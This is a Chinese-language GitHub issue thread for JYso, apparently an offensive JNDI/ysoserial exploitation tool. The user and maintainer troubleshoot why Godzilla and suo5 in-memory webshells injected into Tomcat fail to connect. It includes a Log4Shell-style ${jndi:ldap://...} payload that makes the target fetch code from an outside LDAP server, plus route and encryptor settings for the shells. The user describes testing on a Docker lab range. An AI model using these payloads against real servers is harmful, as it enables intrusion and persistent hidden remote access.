内存马问题 - Githubissues

qi4L / JYso

It can be either a JNDIExploit or a ysoserial.

GNU General Public License v3.0

1.48k stars 174 forks source link

Closed HiIkll closed 3 months ago

HiIkll commented 3 months ago

cmd和bx马可以使用但是gsl马为何连不上是否为配置错误使用为/TomcatBypass/M-EX-MS-TSMSFromJMXS-gzraw,加密器两个都试过

HiIkll commented 3 months ago

suo5内存马也是

qi4L commented 3 months ago

这里需要改为JAVA_AES_RAW

qi4L commented 3 months ago

大约5内存马也是

麻烦说下详细步骤

HiIkll commented 3 months ago

这边重新测试了一下，上回在打gsl码时多了个}操作失误，抱歉，gsl码子能正常连接了 suo5是配置的问题吗? 环境用到docker 靶场

HiIkll commented 3 months ago

/TomcatBypass/M-EX-MS-TSMSFromJMXS-suo5 这样的路由

qi4L commented 3 months ago

如果你要自定义路径为hello，路由应该是这个

/TomcatBypass/M-EX-MS-TSMSFromJMXS-suo5/shell/L2hlbGxv

HiIkll commented 3 months ago

这个hello为他自身路由 /hello?payload=${jndi:ldap://xxxx} 意思是我需要重启定义一个路由才可以使用吗?

HiIkll commented 3 months ago

使用了自定义路由也连接不上/TomcatBypass/M-EX-MS-TSMSFromJMXS-suo5/shell/L3h4

qi4L commented 3 months ago

你把他当成内存马就行了哥们就是就是默认配置写入后，访问写入的qi4l路径，就是suo5的连接路径

qi4L commented 3 months ago

写入后，你先访问一下写入的那个路径看看

HiIkll commented 3 months ago

我原先打的内存马就是没加路由的，/hello?payload=${jndi:ldap://1.1.1.1:1389/TomcatBypass/M-EX-MS-TSMSFromJMXS-suo5} 然后直接访问的/hello suo5连接的,最开始的图就是,但是连接失败了

qi4L commented 3 months ago

没加额外参数应该访问的路径是/qi4l

HiIkll commented 3 months ago

我觉的是没问题的，加了自定义参数和gsl的suo5插件也都打不进去，像gsl，bx，cmd都是可以的，可能是环境问题，我到时候本地搭个测试下，感谢回答,麻烦了

qi4L commented 3 months ago

我加了自定义参数可以打进去你可以-y之后加-gen，看下生成的class文件代码，感谢反馈